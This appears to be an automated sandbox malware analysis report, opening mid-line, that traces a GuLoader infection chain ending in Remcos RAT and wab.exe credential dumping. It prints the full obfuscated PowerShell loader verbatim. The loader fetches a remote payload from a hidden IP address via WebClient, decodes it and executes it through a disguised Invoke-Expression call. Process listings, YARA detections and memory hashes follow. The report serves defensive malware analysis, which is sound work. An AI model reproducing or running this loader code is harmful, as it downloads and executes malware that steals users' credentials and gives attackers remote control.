ducerlA.legatfK,ypteraSpekulabdaemonye PlanlgtSolvolyiProgramsRidglinePhage erBurresneZygosi,sTrangbi Inhabil=Quaff.z IncentrG SteevieAftr,nitTimelns- .ohansCAnth acoFirma anDuksedrtParasite Brogu,nPo,arfot Cellsm Byvaa e$TribadiAChicnesrR.uterenOlivasto Fors,dlA.ainqudtippiessMarty,i ');Skildrerne (Gunflints 'Hy roco$ ChordegUnwithhlReturvroMicrosebSessel.aWagoneelCiviliz:PaategnBLserindvArbejd e BumekslTalmudisRawlplueNinepegr Sk inen edinafeSuburbl Ophobn=Lini mn Unsunke[whosisoS Landssy ImbrexsFal kmntKon,esseTricho mbib iot.IndarbeCB,oknivo KuglelnrappendvAgrobioe Nonvinr U,hailtFrys.di]Un,erst:Narcot.:.estrucFMenagerrMaintenoProportmideyka.BRverkulaLoka plsfoun.fueMisrule6Gus,abl4Sulf,glSAntikomt De,outrMoskvafiAdve.binUnpossigLin.ers(Overpow$KlintekaManhat,lLyocratfOmk,slea easandb OptageeAfsvovltWic,iupiAlbatiosSund,yieKirurgerSy dacteDistriks Labora)Ridesko ');Skildrerne (Gunflints 'defocus$ LigningDanaidelFra.kekohedon,sbCharybdaFattierlBaromet: LinninS ,resteiBalustel aronicv piesineTrllearrFli tlasDroso hmdegradeiCutletftstilli,hNrvrforsNonshri Botswan=Str,nin Cascad[AfhaareSGyp.schy YardwasKom agntOmbudsme.dstyknmTemp.ri.GynaecoT WuffgoeSkuffe.x.ousehotM.croso.Forva.tETre,ketnTorpe.oc Sulp ioPrognosdKlubkamiSalonkonSkumplegKik.ter]Kopsk f:Ptosish:kriminaA CuriouS,ampradCSarpopoITotemisISig,els.Ph.lantGAfstumpeVati,antCrossgrSTern.tft .kulperVict.mii SchoolnIndeflug.kattef(Forespo$ BrokadBKlangenvt iperseAccruablRedundas FlogmaeCommorarKatalogn CatdomeAngloam)Tigh fi ');Skildrerne (Gunflints 'Topwor.$ Fil prgInfloodltrkpa ioBrnebidb ogmrkeaScutel,lSalvier:RuefulnRPrangereFriha nsScrophutRecag ksBetnknit KanskerAutostoaOfr.rwhf,yedropfUdmar seFustagenIngeni,eBlodtabs Afsnit=Brlesin$ KlientSsuspirei Occurel Smackev BarbareTriptllrKardanesAfsendemModellei UnmatutPol.gonhVi.dspesOvovivi.Omg,dedsElsdyrsuOculospbAcarinosDykk netOutlippr AllotriAlteratnRevidergStorcir(Extrabu$UdbredeBPaandteiTelefo.b LnudvilheteropiVulgarioUna.atimEmi sioa MofussnTanglesi 
Accidestrussen,mancipi$FourthlRKvadrateCtosli.hRvhulleu Solecim psigelaHexosepnLini.reiEpidermzGeison,eParatesd.verskr)Noncl n ');Skildrerne $Reststraffenes;"
                  Imagebase:0x7ff7699e0000
                  File size:452'608 bytes
                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000001.00000002.2377560186.0000026CE6643000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:high
                  Has exited:true

                  Target ID:2
                  Start time:04:27:00
                  Start date:02/07/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff7699e0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:3
                  Start time:04:27:02
                  Start date:02/07/2024
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fejdede.ell && echo t"
                  Imagebase:0x7ff6f2f40000
                  File size:289'792 bytes
                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:4
                  Start time:04:27:10
                  Start date:02/07/2024
                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic';If (${host}.CurrentCulture) {$Sinologi++;}Function Gunflints($Handsawfish){$Guvnor=$Handsawfish.Length-$Sinologi;$Beflounce96='SUBsTRI';$Beflounce96+='ng';For( $Fletteprocessers=7;$Fletteprocessers -lt $Guvnor;$Fletteprocessers+=8){$Racings+=$Handsawfish.$Beflounce96.Invoke( $Fletteprocessers, $Sinologi);}$Racings;}function Skildrerne($larrigan){ &($Cumulates) ($larrigan);}$Cryptoglaux=Gunflints 'SlvpapiM Rullego AulostzC,quinaiC acatel TeitmilForzanda Voldsh/unwilt 5Ost.nsi.Prmiere0Glazier Gennems( EmascuW SluppeiPylorosnPolyli d s,ifteoAnalysewConvolvs Intens DamerkkNfngsel.TBedaa e Ptisanr1 Tarrag0 Typif,.Dinguse0.ambesg;Laurent AimilepWSudansaiBestillnAdrenin6.eander4Latesce;Agerdyr A toplaxDiso de6Audi,iv4 Precon; Beregn TvrrebsrTromlervL ftreg: zilasm1Csarre.2 Opsaml1Rringer.Riv nca0Franker)Tilfres systempGUdskregeBawbeescAddendek igua,ooSemenan/ Econo.2Libe ta0 Shaved1Harvard0Bitmnst0Standar1 Trerum0Presump1Subinte By,selvF S,igeriUnrooflrM.nostie Disoccf bservaoFug,ighxTriglyp/Halvoff1Kultu,m2Aut,mob1Klinikk.Haa dva0Triadic ';$spliff=Gunflints 'Bela neUP,oletasKtast.seRejekllrudskyde-GenopleADyffeleg OversteAfskninnEarfulstOmbreaf ';$Parolees=Gunflints 'UdpegelhBlgeb vt Beregnt SyphonpUrfjeld:nicadss/Alufo,i/svingsa1Glycero0 
str.tc3Dep,tat.Vavasor2D.alate3Te,rsta7Annegit.Torkild8Doekspr6Svovlha.Fro.tlu2Strutma4Tegneku7Emb,yol/ApplikaUCorticid RejsegmGemotsma Di,selg orskefrIn.ighteResurget Ove,tr.isbaadshHashpibholie orkL kishn ';$Furibund=Gunflints 'Enkelth>Se.opus ';$Cumulates=Gunflints ' SnitfliforladeeMarlinexOverp i ';$Vandrerkorts='Paatalernes';$Onklerne = Gunflints 'Undu eoeFeelingc Skyldnh,dlydskoWastefu Deflor%U.profiaOver,oppOvertrdp d onnidRigstrna GraasttBnketsia rkanst%Garant.\FrescoeFParaff eUngeniaj Ove bad CardioeIngen.odha,lssteGule.dd.PrstegaePlafo,dlShowboalAllinge Meazlef&Bundtet&Phi,ant Ynglerne ManslacLiglotth.heologoRaynard KrampetP.ragra ';Skildrerne (Gunflints ' Fredni$,ccumbmg AkropolMich.elo SkaanebSpisekraUdsivnilDi,xinr: HyssenKFiskeriuP.einstnUnburntd Dis ere.ntermatstamin.jFo tbrieAa.sindnlooeysueMonterisOver,eatRykindeeCetoniin bri.ebsC,shmer=Underbe(electroc runcatmVi.terhdSelvkla Rangkla/Inco.vecXylosma thainto$Korrig OSphac ln cum.lak.esparilUndercheDvlerehrKontraknPa,ralle.dmeasu)Snarlig ');Skildrerne (Gunflints 'Konkurr$ V.ndibgrigsvaalEfte slo VindicbPrierslaTeltn nlMandsdo:TresindCHippiati LillikrCen.rifcCarumseu AntiagmStolearsSidevejctransfor Gelosii Skarrib Nonp,riProclainR,ppledgUnga,va1Goldaks3Udkaare3Subtera=Keglesp$skyllesPGl,cocoaLftenebrHall,nboForandrlNordmane EksporeNonconssMaskins.ConfratsKunstvapDistriblKalvelbi Un erdtImmatri(Simplic$ColubriFStenf suStnkeprrStandsfiBoghandbKapitaluRub.ikkn.ejlensdDomicil) Ty gde ');Skildrerne (Gunflints 'Ndu gan[J.urnalN HjhuseeO,eosactBic,lor. 
,okhavSCoprop,eAlkoholrBrightsvNecrotyiRidsefjc lejereeInterlaPS,inetsoDipl.piisquawfinOstepintA.acathMInd.rdeaHamartonkortfriaPaasta.gPlanlgneStivnenrDegforh]Kom,ker:Foundfl: Hel,deSJordskreTransvecAg,ntdiu aderskrcoapti iLemlstetUncivilyPolemikPSubs,itr BlisteoCo.ntertBro.kaloP.everic CulturoSk,vbunlBuffsbe Fol,tb= nbigge Later.l[RkvrkerNArckinge VldesftProcent.de.mareSAntisepeReflekscBjergaruConniverKaynetfiEskamottDrypsseyNeiatidP P rrelrResinizo anzonet HypertoFonematcFarmlano Rneb,ilplastsfTdiningmy ImperspSterlaneUndervu]Svagt.e: Incine:RegildfTC.evisvlthermicsChi ois1 Satin.2Buffoon ');$Parolees=$Circumscribing133[0];$Tubae= (Gunflints 'Surclif$takeup.gmedaljelrelstatoB.rgmesbE ilemmaDribledl Stepch: up,rtiA PrograkRepavestAmaze saKdehusfnGeograft,eflatim under o Ce,sordoricycleV,stenfledvinscsCons.bs=KommandNIndefrye DurianwMammoni-,eprievO.accinibStrafpojBesvarbeTvety,icDunnabstLamslaa .hokolaSwoadedey Pe,tapsAtingantcigare e Wronskm Gigado.Bem strNLithophe.ynipidtPostmes. Ge metWHighlane.ellbirbdecim lCOutswinlv,vacehikmpestoeBesyngenS ibestt');$Tubae+=$Kundetjenestens[1];Skildrerne ($Tubae);Skildrerne (Gunflints 'Adresse$ PengelAKabardck Coun,etUfrihedaAlenlannSkalotttAsse,temPromerco Ste.dddSodalite Ska arl.istandsUnderpi.Bl ckfeHKnkkreseK,nspeoaphotogrdPredamneBarytafrUdke nes Bejdse[omhandl$StandarsRumsterpS,krestlF ltrediSynkopefUnpsychfSlalomk]fejltry=Scriptu$FourageCSulphopr B omsty MelicrpBiograftHurdlenoSmdexclgHelfredlLytter a Rebuttu N,ncomx Campe, ');$Lbetidens=Gunflints ' r maun$PardeddAFrilandkDimmestt Nu,bedaAngakoknReauthotUnpeggemE.tersloImpeevid nticomeIchthyil O.ticisHavar r. 
A.trinD GribanoFleshl wC,ristenG.ossopl Tris.eoAnimi ma Jagg.ed I,dekoFAce.ylsiOnsswiml Gearale Calibe(tryksva$PreschoPParitetaeffoliarStrawbro UnvitilKaffekoeO.ooutpe Libid.sCurariz, Hypopo$tndehvlAMixbloorPrimovinTbruddeoHomoeoglBrandbyd StandasMatchet)Pik nte ';$Arnolds=$Kundetjenestens[0];Skildrerne (Gunflints 'M.rkeds$UnpropegLoquitulBlankebo,ristesbBrigadeaRullendlDi.turb:SensomoKGleanabfDisagretGreggrie Bumpi,r ,ortcusTr posp=Okkerfo(GlossopT Scan.ae injenusContractAethere-AfbrydePBenzinsaFokuse.t banalehPorop.y Minimum$.nfeminA lagg,rrGr ynesnvognfuloForge slPti,imndSjldenhs Re.nbu)Snorker ');while (!$Kfters) {Skildrerne (Gunflints 'Acetoni$ Spa drgPtyali.lPrdikatoBor.glybSprogfoaLucarnelStylish:Altern,FUndvreraraxingpaNaalenedSomatoce,usiodi=Nedslag$FunctiotUdbytter PhobicuLuftvaae Recipr ') ;Skildrerne $Lbetidens;Skildrerne (Gunflints ' ForrenSMellemttTy letsa orgivrBrugel,tUpupakr-CirkulrSIfuga,ulEarflapeIndst,de BriarepSlisken Rudeskr4flashly ');Skildrerne (Gunflints 'F,rudbe$ Bentjegkvintetl TermomoSem.orgb epetrpa GotfrelUskadel:KransenK Rebaptf Udmrk.tGaylefreLeopardrmoralizs Infor =Fastkr ( onfesTTab osieUnfondns hangertstereos- DustouPbudgiesaSchistatPrinterh Improb Demogra$Urede,bA Kas kurTrommetnCari atoK ndinglKnalderdForud.esKarakte).ryllup ') ;Skildrerne (Gunflints 'acceler$CognacegMorfinil GennemoMangonibEfterfoaLipodyslteleuto:Pat ticSCente ec HjovneaSmaaovem DoctorpRonnif iRagtimeeP oalcosTonneau=Sphecin$Rambledg .arietlkons,ruoSanmar,bOktavera DagldelHobende:ReflowiCSystal ahydrocotPentagyhJatropha,dresserDeweddoimarchern Afvbni+Lsehast+Oriflam%Udspalt$ReflexoCKargoeriCentigrrPaa aefcDis avouSubtensmUnderspsT.oublecEcrus,arRligs eisaggonibKok,ttoiJohannenchylifig Reli,t1Tilbund3Ama,gam3 amvitt.GrassmecUpaaagtoSporinguStaktopnTjattentLantern ') ;$Parolees=$Circumscribing133[$Scampies];}$Bibliomanis=316121;$Rehumanized=28218;Skildrerne (Gunflints 'Zincode$Kjoveacgsnu fbolSe ibaroSpectrobMaalscoa Rubinsl Mononu: isidenao 
ducerlA.legatfK,ypteraSpekulabdaemonye PlanlgtSolvolyiProgramsRidglinePhage erBurresneZygosi,sTrangbi Inhabil=Quaff.z IncentrG SteevieAftr,nitTimelns- .ohansCAnth acoFirma anDuksedrtParasite Brogu,nPo,arfot Cellsm Byvaa e$TribadiAChicnesrR.uterenOlivasto Fors,dlA.ainqudtippiessMarty,i ');Skildrerne (Gunflints 'Hy roco$ ChordegUnwithhlReturvroMicrosebSessel.aWagoneelCiviliz:PaategnBLserindvArbejd e BumekslTalmudisRawlplueNinepegr Sk inen edinafeSuburbl Ophobn=Lini mn Unsunke[whosisoS Landssy ImbrexsFal kmntKon,esseTricho mbib iot.IndarbeCB,oknivo KuglelnrappendvAgrobioe Nonvinr U,hailtFrys.di]Un,erst:Narcot.:.estrucFMenagerrMaintenoProportmideyka.BRverkulaLoka plsfoun.fueMisrule6Gus,abl4Sulf,glSAntikomt De,outrMoskvafiAdve.binUnpossigLin.ers(Overpow$KlintekaManhat,lLyocratfOmk,slea easandb OptageeAfsvovltWic,iupiAlbatiosSund,yieKirurgerSy dacteDistriks Labora)Ridesko ');Skildrerne (Gunflints 'defocus$ LigningDanaidelFra.kekohedon,sbCharybdaFattierlBaromet: LinninS ,resteiBalustel aronicv piesineTrllearrFli tlasDroso hmdegradeiCutletftstilli,hNrvrforsNonshri Botswan=Str,nin Cascad[AfhaareSGyp.schy YardwasKom agntOmbudsme.dstyknmTemp.ri.GynaecoT WuffgoeSkuffe.x.ousehotM.croso.Forva.tETre,ketnTorpe.oc Sulp ioPrognosdKlubkamiSalonkonSkumplegKik.ter]Kopsk f:Ptosish:kriminaA CuriouS,ampradCSarpopoITotemisISig,els.Ph.lantGAfstumpeVati,antCrossgrSTern.tft .kulperVict.mii SchoolnIndeflug.kattef(Forespo$ BrokadBKlangenvt iperseAccruablRedundas FlogmaeCommorarKatalogn CatdomeAngloam)Tigh fi ');Skildrerne (Gunflints 'Topwor.$ Fil prgInfloodltrkpa ioBrnebidb ogmrkeaScutel,lSalvier:RuefulnRPrangereFriha nsScrophutRecag ksBetnknit KanskerAutostoaOfr.rwhf,yedropfUdmar seFustagenIngeni,eBlodtabs Afsnit=Brlesin$ KlientSsuspirei Occurel Smackev BarbareTriptllrKardanesAfsendemModellei UnmatutPol.gonhVi.dspesOvovivi.Omg,dedsElsdyrsuOculospbAcarinosDykk netOutlippr AllotriAlteratnRevidergStorcir(Extrabu$UdbredeBPaandteiTelefo.b LnudvilheteropiVulgarioUna.atimEmi sioa MofussnTanglesi 
Accidestrussen,mancipi$FourthlRKvadrateCtosli.hRvhulleu Solecim psigelaHexosepnLini.reiEpidermzGeison,eParatesd.verskr)Noncl n ');Skildrerne $Reststraffenes;"
                  Imagebase:0x4d0000
                  File size:433'152 bytes
                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.2236325736.0000000008060000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.2236560886.0000000009F6C000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.2230426508.0000000005418000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:high
                  Has exited:true

                  Target ID:5
                  Start time:04:27:11
                  Start date:02/07/2024
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fejdede.ell && echo t"
                  Imagebase:0x240000
                  File size:236'544 bytes
                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:9
                  Start time:04:27:34
                  Start date:02/07/2024
                  Path:C:\Program Files (x86)\Windows Mail\wab.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                  Imagebase:0xc80000
                  File size:516'608 bytes
                  MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.2993796074.000000000663B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.2993796074.0000000006623000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.2991104356.0000000002F0F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:high
                  Has exited:false

                  Target ID:10
                  Start time:04:27:58
                  Start date:02/07/2024
                  Path:C:\Program Files (x86)\Windows Mail\wab.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gcunaectpsfuvitxczvfdsahw"
                  Imagebase:0xc80000
                  File size:516'608 bytes
                  MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:11
                  Start time:04:27:58
                  Start date:02/07/2024
                  Path:C:\Program Files (x86)\Windows Mail\wab.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\rezgswvvdaxhfwhbljiggfuyfzlyb"
                  Imagebase:0xc80000
                  File size:516'608 bytes
                  MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:12
                  Start time:04:27:58
                  Start date:02/07/2024
                  Path:C:\Program Files (x86)\Windows Mail\wab.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\byfqtofpripmidvfcuvirkhhgovgcyok"
                  Imagebase:0xc80000
                  File size:516'608 bytes
                  MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:13
                  Start time:04:28:04
                  Start date:02/07/2024
                  Path:C:\Program Files (x86)\Windows Mail\wab.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\yhgaygccbnmkekwxnjvujyny"
                  Imagebase:0xc80000
                  File size:516'608 bytes
                  MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:14
                  Start time:04:28:04
                  Start date:02/07/2024
                  Path:C:\Program Files (x86)\Windows Mail\wab.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jjttrynvpvepgykbwuiwulipima"
                  Imagebase:0xc80000
                  File size:516'608 bytes
                  MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:15
                  Start time:04:28:04
                  Start date:02/07/2024
                  Path:C:\Program Files (x86)\Windows Mail\wab.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jjttrynvpvepgykbwuiwulipima"
                  Imagebase:0xc80000
                  File size:516'608 bytes
                  MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Has exited:true

                  Target ID:16
                  Start time:04:28:04
                  Start date:02/07/2024
                  Path:C:\Program Files (x86)\Windows Mail\wab.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tdzlsryxddwcregfnedpxpcyjtslpk"
                  Imagebase:0xc80000
                  File size:516'608 bytes
                  MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Has exited:true

                    Memory Dump Source
                    • Source File: 00000001.00000002.2397540799.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_7ffd9b880000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 799f1fff4f06e2c7c24f391b632399a13d5561193c298f3657c69b67b0cf1c9d
                    • Instruction ID: baed93ac8f11ff7ed9347022082065e84d7f11fa6dc43e6eb640c97b533e51f4
                    • Opcode Fuzzy Hash: 799f1fff4f06e2c7c24f391b632399a13d5561193c298f3657c69b67b0cf1c9d
                    • Instruction Fuzzy Hash: B0F1C830A09E4E8FEBA8DF28C8557E937D1FF58310F04426EE85DC7695DB35A9418B82
                    Memory Dump Source
                    • Source File: 00000001.00000002.2397540799.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_7ffd9b880000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 33f91700ef43494c9860c158d67ffcb9cba50a951afe3f42ff1f3c5f92e16d54
                    • Instruction ID: 5a432be99233754084bd1d0577a26d27f5f7e3591ce1fef6e010fa6dbb21acce
                    • Opcode Fuzzy Hash: 33f91700ef43494c9860c158d67ffcb9cba50a951afe3f42ff1f3c5f92e16d54
                    • Instruction Fuzzy Hash: E9E1C330A09A4E8FEBA8DF28C8557E977D1FF58310F14426EE85DC7295DF38A9418B81
                    Memory Dump Source
                    • Source File: 00000001.00000002.2398260931.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_7ffd9b950000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 89bdb9cd1f7784941dea14b677b50d3c0ba423fb9a6df583c04f949923ed9551
                    • Instruction ID: ef641e9255f624ae65170609e5bff3b83d1513b518aac361524a6c5151f19f52
                    • Opcode Fuzzy Hash: 89bdb9cd1f7784941dea14b677b50d3c0ba423fb9a6df583c04f949923ed9551
                    • Instruction Fuzzy Hash: 0FE16A72B5FA8E1FEBA5DBA848745B47BE1EF55310F0901BAD85DC71F3CA68A9018301
                    Memory Dump Source
                    • Source File: 00000001.00000002.2398260931.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_7ffd9b950000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a979e287f6334f42a1c3988e41f391937e97ae06bc3a083de518e0fb7822d20b
                    • Instruction ID: 128bb6eeaa973763072d48d34c40e826bc5a6ff3ccf84f2609d41f0f25995a71
                    • Opcode Fuzzy Hash: a979e287f6334f42a1c3988e41f391937e97ae06bc3a083de518e0fb7822d20b
                    • Instruction Fuzzy Hash: AED14422B1FA8E1FEBA59BA848645B47BE1EF55210B0901FBD85CC70E3ED5CAE05C341
                    Memory Dump Source
                    • Source File: 00000001.00000002.2398260931.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_7ffd9b950000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7b57c302901e75ed439ba484951c17ceeed804b1c3de507a55bb857be7a50436
                    • Instruction ID: 027dc0a158c70d35cde9ffcf12c16f63b5a51a28bdbf7a729fad04037b1a88f0
                    • Opcode Fuzzy Hash: 7b57c302901e75ed439ba484951c17ceeed804b1c3de507a55bb857be7a50436
                    • Instruction Fuzzy Hash: 54510422B6FACE1FE7A5EBA848705B46BE1EF55310B5900BAD95CC71F3DD68A8448301
                    Memory Dump Source
                    • Source File: 00000001.00000002.2398260931.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_7ffd9b950000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e11bfd25fbbd569f2781c350e82ab349c820321c0dca51ba848480c14f606888
                    • Instruction ID: 940a45094ad2fcb2c90de9ce8d3e7b43ed9bf1e716a25e8c9040a9d129220c32
                    • Opcode Fuzzy Hash: e11bfd25fbbd569f2781c350e82ab349c820321c0dca51ba848480c14f606888
                    • Instruction Fuzzy Hash: CA312A62F6FADE1BF3B697D818B11B467C1AF10250B1901BAD95CC30E3ED5C6E00C241
                    Memory Dump Source
                    • Source File: 00000001.00000002.2397540799.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_7ffd9b880000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                    • Instruction ID: 1fa9c4b6de25af3c09eeda563ddac642f27ce745a1e9786955744c945ca2b0d9
                    • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                    • Instruction Fuzzy Hash: 2A01A77020CB0C4FD748EF0CE451AA5B3E0FB89320F10056DE58AC36A1DA32E881CB41
                    Memory Dump Source
                    • Source File: 00000004.00000002.2227709950.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_2a50000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 123653cfaa0d08fa25b373355ee41dbefbe27b34937f7fc624fd01b97f78ac6c
                    • Instruction ID: de159368e665a586b00941eaf5c93c94a245b8bb3aa73b3ff501cec7ebdaacc0
                    • Opcode Fuzzy Hash: 123653cfaa0d08fa25b373355ee41dbefbe27b34937f7fc624fd01b97f78ac6c
                    • Instruction Fuzzy Hash: 7BB13CB0E002198FDF14CFA9D98579EBBF2BF89318F148129D815E7694EF749845CB81
                    Memory Dump Source
                    • Source File: 00000004.00000002.2227709950.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_2a50000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8115deaa565e09bd2f04796e27b0724d72ff5af0b5c37cc4dd1dea837f6691eb
                    • Instruction ID: ec73d7fb9b52f13ccaaf1caa91d84cd1fd0572073e772625a23d6e7232885b30
                    • Opcode Fuzzy Hash: 8115deaa565e09bd2f04796e27b0724d72ff5af0b5c37cc4dd1dea837f6691eb
                    • Instruction Fuzzy Hash: D4B18E71E00219CFDB10CFA9D89179EBBF2AF89318F148529DC15EB694EF349845CB81
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2233888088.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_6e40000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
                    • API String ID: 0-879563280
